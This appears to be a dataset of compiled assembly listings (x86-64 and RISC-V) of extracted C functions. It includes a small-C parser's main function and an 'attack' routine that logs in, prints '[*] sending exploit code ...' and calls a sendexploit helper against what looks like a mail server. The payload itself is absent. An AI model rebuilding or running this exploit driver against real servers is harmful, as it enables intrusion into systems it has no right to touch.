.cfi_def_cfa_offset 336 pushq 152(%rsp) .cfi_def_cfa_offset 344 pushq 152(%rsp) .cfi_def_cfa_offset 352 pushq 152(%rsp) .cfi_def_cfa_offset 360 pushq 152(%rsp) .cfi_def_cfa_offset 368 pushq 152(%rsp) .cfi_def_cfa_offset 376 pushq 152(%rsp) .cfi_def_cfa_offset 384 movq 152(%rsp), %r9 movq 144(%rsp), %r8 movq 136(%rsp), %rdx call mpc_cleanup@PLT movl $0, 288(%rsp) movl 288(%rsp), %eax subq $-128, %rsp .cfi_def_cfa_offset 256 cmpl $4, %eax jg .L11 .p2align 4,,10 .p2align 3 .L12: movl 160(%rsp), %eax addl $1, %eax movl %eax, 160(%rsp) movl 160(%rsp), %eax cmpl $4, %eax jle .L12 .L11: movq 184(%rsp), %rax subq %fs:40, %rax jne .L21 addq $200, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L3: .cfi_restore_state movl stdin(%rip), %esi leaq 160(%rsp), %rcx movq %rbx, %rdx leaq .LC25(%rip), %rdi call mpc_parse_pipe@PLT testq %rax, %rax je .L9 movq 168(%rsp), %rdi call mpc_ast_print@PLT movq 168(%rsp), %rdi call mpc_ast_delete@PLT jmp .L8 .L21: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl stdin .bss .align 4 .type stdin, @object .size stdin, 4 stdin: .zero 4 .globl stderr .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl MPCA_LANG_DEFAULT .align 4 .type MPCA_LANG_DEFAULT, @object .size MPCA_LANG_DEFAULT, 4 MPCA_LANG_DEFAULT: .zero 4 .globl g_aug_volatile_6185 .data .align 4 .type g_aug_volatile_6185, @object .size g_aug_volatile_6185, 4 g_aug_volatile_6185: .long 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_rlcc.c_main_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "ident" .align 3 .LC1: .string "number" .align 3 .LC2: .string "character" .align 3 .LC3: .string "string" .align 3 .LC4: .string "factor" .align 3 .LC5: .string "term" .align 3 .LC6: .string "lexp" .align 3 .LC7: .string "stmt" .align 3 .LC8: .string "exp" .align 3 .LC9: .string "vartype" .align 3 .LC10: .string "typeident" .align 3 .LC11: .string "decls" .align 3 .LC12: .string "args" .align 3 .LC13: .string "body" .align 3 .LC14: .string "comment" .align 3 .LC15: .string "linecomment" .align 3 .LC16: .string "asm" .align 3 .LC17: .string "procedure" .align 3 .LC18: .string "cprocedure" .align 3 .LC19: .string "sigdef" .align 3 .LC20: .string "sigbody" .align 3 .LC21: .string "includes" .align 3 .LC22: .string "smallc" .align 3 .LC23: .ascii " ident : /[a-zA-Z_][a-zA-Z0-9_]*/ ; " .ascii " \n number : /[0-9]+/ ; " .ascii " \n character : /'.'/ ; " .ascii " \n string : /\"(\\\\.|[^\"])*\"/ ; " .ascii " \n " .ascii " \n factor : '(' <le" .ascii "xp> ')' \n |" .ascii " <number> \n " .ascii " | <character> " .ascii " \n | <string> " .ascii " \n | <ident> '(' <lexp>? (',' <lexp>)* '" .ascii ")' \n | <ident> ; " .ascii " \n " .ascii " \n term : <factor> ((" .ascii "'*' | '/' | '%') <factor>)* ; \n lexp : <te" .ascii "rm> (('+' | '-') <term>)* ; \n " .ascii " \n" .ascii " stmt : '{' <stmt>* '}' " .ascii " \n | \"while\" '(' <exp> ')' <stmt> " .ascii " \n | \"if\" '(' <exp> ')' <stmt> " .ascii " \n | <ident> '=' <lexp> ';' " .ascii " \n | \"print\" '(' <" .ascii "lexp>? ')' ';' \n | \"retur" .ascii "n\" <lexp>? ';' \n |" .ascii " <ident> '(' (<number>|<ident>|<string>)? (',' (<string>|<nu" .ascii "mber>|<ident>))* ')' ';' ; \n " .ascii " \n exp : <le" .ascii "xp> '>' <lexp> \n " .ascii " | <lexp> '<' <lexp> \n" .ascii " | <lexp> \">=\" <lexp> " .ascii " \n | <lexp> \"<=\" <lexp> " .ascii " \n | <lexp> \"!=\" <lexp> " .ascii " \n | <lexp> \"==\" <lexp> ; " .ascii " \n " .ascii " " .ascii " \n vartype : (\"int\" | \"char" .ascii "\") ; \n typeident : <vartype>" .ascii " <ident> ; \n decls : (" .ascii "<typeident> ';')* ; \n args " .ascii " : <typeident>? (',' <typeident>)* ; " .ascii "\n body : '{' <decls> <stmt>* '}' ; " .ascii " \n comment : /\\/\\*([^\\*])*\\*\\// ; " .ascii " \n linecomment : /\\/\\/([^\\n])*/ ; " .ascii " \n asm : /\\:([^\\n])*/ ; " .ascii " \n procedure : <ident> '@' \"glob" .ascii "al\" '(' <number>? ')' <body> ; \n cprocedure : <vartype> <i" .ascii "dent> '(' <args> ')' <body> ; \n sigdef : <ident> '@' <id" .ascii "ent> '(" .string "' <number> ')' ';' ; \n sigbody : '@' <ident> '(' <number> ')' ';' ; \n includes : (\"#include\" <string>)* ; \n smallc : /^/ (<comment>|<asm>|<linecomment>|<sigdef>|<sigbody>|<procedure>|<cprocedure>)* <includes> <decls> /$/ ; \n" .align 3 .LC24: .string "; TAG = %s (%s)\n" .align 3 .LC25: .string "<stdin>" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-416 la a4,__stack_chk_guard ld a5, 0(a4) sd a5, 296(sp) li a5, 0 lw a5,.LANCHOR0 mv a4,a0 addiw a5,a5,1 lla a0,.LC0 sd ra,408(sp) sd a1,264(sp) sd a4,240(sp) sd s0,400(sp) sw a5,.LANCHOR0,a4 sd s1,392(sp) sd s2,384(sp) sd s3,376(sp) sd s4,368(sp) sd s5,360(sp) sd s6,352(sp) sd s7,344(sp) sd s8,336(sp) sd s9,328(sp) sd s10,320(sp) sd s11,312(sp) call mpc_new@plt mv s1,a0 lla a0,.LC1 call mpc_new@plt mv s2,a0 lla a0,.LC2 call mpc_new@plt mv s3,a0 lla a0,.LC3 call mpc_new@plt mv s4,a0 lla a0,.LC4 call mpc_new@plt mv s5,a0 lla a0,.LC5 call mpc_new@plt mv s6,a0 lla a0,.LC6 call mpc_new@plt mv s7,a0 lla a0,.LC7 call mpc_new@plt mv a5,a0 lla a0,.LC8 sd a5,144(sp) call mpc_new@plt mv a5,a0 lla a0,.LC9 sd a5,152(sp) call mpc_new@plt mv a5,a0 lla a0,.LC10 sd a5,160(sp) call mpc_new@plt mv a5,a0 lla a0,.LC11 sd a5,168(sp) call mpc_new@plt mv a5,a0 lla a0,.LC12 sd a5,176(sp) call mpc_new@plt mv a5,a0 lla a0,.LC13 sd a5,184(sp) call mpc_new@plt mv a5,a0 lla a0,.LC14 sd a5,192(sp) call mpc_new@plt mv a5,a0 lla a0,.LC15 sd a5,200(sp) call mpc_new@plt mv a5,a0 lla a0,.LC16 sd a5,256(sp) call mpc_new@plt mv a4,a0 lla a0,.LC17 sd a4,248(sp) call mpc_new@plt mv a3,a0 lla a0,.LC18 sd a3,208(sp) call mpc_new@plt mv s8,a0 lla a0,.LC19 sd s8,216(sp) call mpc_new@plt mv s9,a0 lla a0,.LC20 sd s9,224(sp) call mpc_new@plt mv s8,a0 lla a0,.LC21 call mpc_new@plt mv s10,a0 lla a0,.LC22 sd s10,232(sp) call mpc_new@plt ld a4,216(sp) lla s11,.LANCHOR1 mv s0,a0 lw a0,0(s11) sd a4,96(sp) ld a4,208(sp) ld a5,256(sp) sd s7,0(sp) sd a4,88(sp) ld a4,248(sp) sd a5,72(sp) ld a5,144(sp) sd a4,80(sp) ld a4,200(sp) sd a5,8(sp) mv a7,s6 sd a4,64(sp) ld a4,192(sp) mv a6,s5 mv a5,s4 sd a4,56(sp) ld a4,184(sp) mv a3,s2 mv a2,s1 sd a4,48(sp) ld a4,176(sp) lla a1,.LC23 sd zero,136(sp) sd a4,40(sp) ld a4,168(sp) sd s0,128(sp) sd s10,120(sp) sd a4,32(sp) ld a4,160(sp) sd s8,112(sp) sd s9,104(sp) sd a4,24(sp) ld a4,152(sp) sd a4,16(sp) mv a4,s3 call mpca_lang@plt beq a0,zero,.L2 mv s8,a0 call mpc_err_print@plt mv a0,s8 call mpc_err_delete@plt li a0,1 call exit@plt .L2: ld a5,240(sp) ble a5,zero,.L3 ld a5,264(sp) addi a2,sp,280 mv a1,s0 ld a0,8(a5) call mpc_parse_contents@plt bne a0,zero,.L21 .L9: ld a0,280(sp) call mpc_err_print@plt ld a0,280(sp) call mpc_err_delete@plt .L8: ld a5,232(sp) mv a4,s4 mv a7,s7 sd a5,88(sp) ld a5,224(sp) mv a6,s6 mv a3,s3 sd a5,80(sp) ld a5,216(sp) mv a2,s2 mv a1,s1 sd a5,72(sp) ld a5,208(sp) li a0,17 sd s0,96(sp) sd a5,64(sp) ld a5,200(sp) sd a5,56(sp) ld a5,192(sp) sd a5,48(sp) ld a5,184(sp) sd a5,40(sp) ld a5,176(sp) sd a5,32(sp) ld a5,168(sp) sd a5,24(sp) ld a5,160(sp) sd a5,16(sp) ld a5,152(sp) sd a5,8(sp) ld a5,144(sp) sd a5,0(sp) mv a5,s5 call mpc_cleanup@plt sw zero,280(sp) lw a4,280(sp) li a5,4 bgt a4,a5,.L11 li a4,4 .L12: lw a5,280(sp) addiw a5,a5,1 sw a5,280(sp) lw a5,280(sp) ble a5,a4,.L12 .L11: la a5,__stack_chk_guard ld a4, 296(sp) ld a5, 0(a5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L22 ld ra,408(sp) ld s0,400(sp) ld s1,392(sp) ld s2,384(sp) ld s3,376(sp) ld s4,368(sp) ld s5,360(sp) ld s6,352(sp) ld s7,344(sp) ld s8,336(sp) ld s9,328(sp) ld s10,320(sp) ld s11,312(sp) li a0,0 addi sp,sp,416 jr ra .L21: lw a1,4(s11) ld a0,288(sp) call mpc_ast_print_to@plt ld s8,288(sp) lw a5,0(s8) ble a5,zero,.L5 li s9,0 lla s11,.LC24 .L6: ld a4,16(s8) slli a2,s9,3 mv a0,s11 add a4,a4,a2 ld s10,0(a4) addi s9,s9,1 lw a2,4(s10) lw a1,8(s10) call eprintf@plt mv a0,s10 call processNode@plt lw a2,0(s8) sext.w a4,s9 bgt a2,a4,.L6 ld s8,288(sp) .L5: mv a0,s8 call mpc_ast_delete@plt j .L8 .L3: lw a1,8(s11) addi a3,sp,280 mv a2,s0 lla a0,.LC25 call mpc_parse_pipe@plt beq a0,zero,.L9 ld a0,288(sp) call mpc_ast_print@plt ld a0,288(sp) call mpc_ast_delete@plt j .L8 .L22: call __stack_chk_fail@plt .size main, .-main .globl stdin .globl stderr .globl MPCA_LANG_DEFAULT .globl g_aug_volatile_6185 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_6185, @object .size g_aug_volatile_6185, 4 g_aug_volatile_6185: .word 4 .bss .align 2 .set .LANCHOR1,. + 0 .type MPCA_LANG_DEFAULT, @object .size MPCA_LANG_DEFAULT, 4 MPCA_LANG_DEFAULT: .zero 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .type stdin, @object .size stdin, 4 stdin: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_372.c_attack_aug_v3_6
.file "extr_372.c_attack_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "<<< %s\n" .LC1: .string "%d" .LC2: .string "[*] login failed\n" .LC3: .string "[*] sending exploit code ...\n" .LC4: .string "00000" .LC5: .string "[*] done" .text .p2align 4 .globl attack .type attack, @function attack: .LFB1: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pxor %xmm0, %xmm0 leaq .LC1(%rip), %r15 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 movl $128, %r13d pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movl %edi, %r12d pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 leal 1(%r12), %ebp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $2136, %rsp .cfi_def_cfa_offset 2192 movq %rsi, 16(%rsp) leaq 56(%rsp), %rbx leaq 80(%rsp), %rdi movq %rdx, 24(%rsp) leaq 64(%rsp), %r14 movl %ecx, 44(%rsp) movl $254, %ecx movq %r8, 32(%rsp) movq %fs:40, %rax movq %rax, 2120(%rsp) xorl %eax, %eax movaps %xmm0, 64(%rsp) rep stosq movq %rbx, %rdi call FD_ZERO@PLT movq %rbx, %rsi movl %r12d, %edi call FD_SET@PLT leaq 60(%rsp), %rax movq %rax, 8(%rsp) .p2align 4,,10 .p2align 3 .L3: xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jle .L3 movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L3 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi subl $129, %r13d call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT cmpl $5, %r13d ja .L5 leaq .L7(%rip), %rdx movslq (%rdx,%r13,4), %rax addq %rdx, %rax notrack jmp *%rax .section .rodata .align 4 .align 4 .L7: .long .L12-.L7 .long .L11-.L7 .long .L10-.L7 .long .L31-.L7 .long .L8-.L7 .long .L6-.L7 .text .L5: movq 16(%rsp), %rsi movl %r12d, %edi call sendlogin@PLT movl 40(%rsp), %r10d testl %r10d, %r10d jle .L18 xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jle .L14 movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L14 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L12: movq 24(%rsp), %rsi movl %r12d, %edi call sendpassword@PLT movl 40(%rsp), %r9d testl %r9d, %r9d jle .L18 xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jle .L39 movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L39 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L6: movl %r12d, %edi call delmessage@PLT movl 40(%rsp), %r8d testl %r8d, %r8d jle .L18 xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jle .L37 movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L37 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L8: movl %r12d, %edi call purgemessage@PLT movl 40(%rsp), %edi testl %edi, %edi jle .L18 .L99: xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jg .L97 .L33: movl $130, %r13d jmp .L3 .p2align 4,,10 .p2align 3 .L92: movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L27 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L31: cmpl $200, 60(%rsp) je .L105 .L101: movl 40(%rsp), %edx testl %edx, %edx jle .L18 .L98: xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jg .L92 .L27: movl $132, %r13d jmp .L3 .L108: movl stderr(%rip), %edi leaq .LC3(%rip), %rsi call fprintf@PLT movq 16(%rsp), %rsi movq 32(%rsp), %rcx movl %r12d, %edi movl 44(%rsp), %edx call sendexploit@PLT movl 40(%rsp), %esi testl %esi, %esi jle .L18 xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jle .L30 movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L30 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L10: movl $5, %edi call sleep@PLT movl %r12d, %edi call readmessage@PLT movl 40(%rsp), %ecx testl %ecx, %ecx jg .L98 .L18: movq 2120(%rsp), %rax subq %fs:40, %rax jne .L106 addq $2136, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L97: .cfi_restore_state movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L33 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L11: movl 60(%rsp), %eax cmpl $500, %eax jg .L107 cmpl $230, %eax je .L108 movl 40(%rsp), %eax testl %eax, %eax jg .L99 jmp .L18 .p2align 4,,10 .p2align 3 .L37: movl $133, %r13d jmp .L3 .p2align 4,,10 .p2align 3 .L39: movl $134, %r13d jmp .L3 .p2align 4,,10 .p2align 3 .L14: movl $129, %r13d jmp .L3 .L105: leaq .LC4(%rip), %rsi movq %r14, %rdi call strstr@PLT testl %eax, %eax je .L101 movq 32(%rsp), %rsi movq %r14, %rdi call strstr@PLT testl %eax, %eax je .L101 leaq .LC5(%rip), %rdi call puts@PLT jmp .L101 .L30: movl $131, %r13d jmp .L3 .L107: movl stderr(%rip), %edi leaq .LC2(%rip), %rsi call fprintf@PLT jmp .L18 .L106: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size attack, .-attack .globl stderr .bss .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl g_aug_volatile_8398 .data .align 4 .type g_aug_volatile_8398, @object .size g_aug_volatile_8398, 4 g_aug_volatile_8398: .long 10 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_372.c_attack_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "<<< %s\n" .align 3 .LC1: .string "%d" .align 3 .LC2: .string "[*] login failed\n" .align 3 .LC3: .string "[*] sending exploit code ...\n" .align 3 .LC4: .string "00000" .align 3 .LC5: .string "[*] done" .text .align 1 .globl attack .type attack, @function attack: addi sp,sp,-176 sd ra,168(sp) sd s0,160(sp) sd s1,152(sp) sd s2,144(sp) sd s3,136(sp) sd s4,128(sp) sd s5,120(sp) sd s6,112(sp) sd s7,104(sp) sd s8,96(sp) sd s9,88(sp) sd s10,80(sp) sd s11,72(sp) li s1,4096 addi sp,sp,-2032 li s0,-4096 addi a5,s1,-2032 sd a3,16(sp) sd a4,8(sp) addi a3,s1,-2040 addi a4,sp,32 add a3,a3,a4 mv s3,a0 add a5,a5,s0 addi a0,sp,32 la s11,__stack_chk_guard ld a4, 0(s11) sd a4, 0(a3) li a4, 0 add a5,a5,a0 mv s9,a1 mv s10,a2 li a1,0 li a2,2040 addi a0,sp,48 sd zero,2040(a5) call memset@plt addi s0,s0,2032 addi a5,s1,-2032 add a5,a5,s0 addi a4,sp,32 add s0,a5,a4 mv a0,s0 call FD_ZERO@plt mv a1,s0 mv a0,s3 mv s5,s1 call FD_SET@plt li s8,-4096 addi s4,s8,2040 addi a4,s5,-2032 addi a3,sp,32 add a4,a4,s4 addi a5,s5,-2032 addi s7,s8,2036 li s6,4096 add s4,a4,a3 add a5,a5,a3 addi a4,s5,-2032 add a4,a4,s7 sub a5,a5,s6 addiw s2,s3,1 li s1,128 add s7,a4,a3 sd a5,24(sp) .L3: li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L3 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L3 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt addiw s1,s1,-129 sext.w a4,s1 li a5,5 bgtu a4,a5,.L5 slli a5,s1,32 lla a4,.L7 srli s1,a5,30 add s1,s1,a4 lw a5,0(s1) add a5,a5,a4 jr a5 .section .rodata .align 2 .align 2 .L7: .word .L12-.L7 .word .L11-.L7 .word .L10-.L7 .word .L9-.L7 .word .L8-.L7 .word .L6-.L7 .text .L5: mv a1,s9 mv a0,s3 call sendlogin@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L14 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L14 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L12: mv a1,s10 mv a0,s3 call sendpassword@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L39 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L39 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L6: mv a0,s3 call delmessage@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L37 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L37 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L8: mv a0,s3 call purgemessage@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt bgt a0,zero,.L89 .L33: li s1,130 j .L3 .L91: lla a1,.LC3 lw a0,.LANCHOR0 call fprintf@plt ld a3,8(sp) ld a2,16(sp) mv a1,s9 mv a0,s3 call sendexploit@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L30 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L30 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L10: li a0,5 call sleep@plt mv a0,s3 call readmessage@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt bgt a0,zero,.L90 .L27: li s1,132 j .L3 .L89: mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L33 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L11: li a5,4096 addi a5,a5,-2032 addi a4,sp,32 add a5,a5,s8 add a5,a5,a4 lw a5,2036(a5) li a4,500 bgt a5,a4,.L34 li s1,230 .L35: beq a5,s1,.L91 ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L33 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L33 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt ld a5,24(sp) li a4,500 lw a5,2036(a5) ble a5,a4,.L35 .L34: lla a1,.LC2 lw a0,.LANCHOR0 call fprintf@plt .L18: li a5,4096 addi a4,sp,32 addi a5,a5,-2040 add a5,a5,a4 ld a4, 0(a5) ld a5, 0(s11) xor a5, a4, a5 li a4, 0 bne a5,zero,.L92 addi sp,sp,2032 ld ra,168(sp) ld s0,160(sp) ld s1,152(sp) ld s2,144(sp) ld s3,136(sp) ld s4,128(sp) ld s5,120(sp) ld s6,112(sp) ld s7,104(sp) ld s8,96(sp) ld s9,88(sp) ld s10,80(sp) ld s11,72(sp) li a0,0 addi sp,sp,176 jr ra .L90: mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L27 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L9: li a5,4096 addi a5,a5,-2032 add a5,a5,s8 addi a4,sp,32 add s1,a5,a4 .L31: lw a4,2036(s1) li a5,200 beq a4,a5,.L93 .L85: ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L27 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L27 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt j .L31 .L37: li s1,133 j .L3 .L39: li s1,134 j .L3 .L14: li s1,129 j .L3 .L93: lla a1,.LC4 mv a0,s4 call strstr@plt beq a0,zero,.L85 ld a1,8(sp) mv a0,s4 call strstr@plt beq a0,zero,.L85 lla a0,.LC5 call puts@plt j .L85 .L30: li s1,131 j .L3 .L92: call __stack_chk_fail@plt .size attack, .-attack .globl stderr .globl g_aug_volatile_8398 .data .align 2 .type g_aug_volatile_8398, @object .size g_aug_volatile_8398, 4 g_aug_volatile_8398: .word 10 .bss .align 2 .set .LANCHOR0,. + 0 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_22786.c_main_aug_v3_8
